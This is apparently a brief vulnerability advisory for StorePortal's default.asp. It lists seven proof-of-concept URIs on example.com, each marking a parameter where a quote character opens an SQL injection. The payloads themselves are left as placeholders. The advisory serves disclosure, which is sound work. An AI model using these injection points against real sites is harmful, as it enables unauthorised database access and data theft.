|
|
StorePortal Default.ASP Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concept URIs are available: http://www.example.com/default.asp?language='[SQL injection] http://www.example.com/default.asp?id=1&opr=2&%3bpic='[SQL injection] http://www.example.com/default.asp?opr=35&id=1&idcategory='[SQL injection]&idcategoryp=1 http://www.example.com/default.asp?opr=35&id=1&idcategory=1&idcategoryp='[SQL injection] http://www.example.com/default.asp?mnu=&id=1&opr=5&content='[SQL injection] http://www.example.com/default.asp?id=1&opr=4&keyword='[SQL injection] http://www.example.com/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='[SQL injection] |
|
Privacy Statement |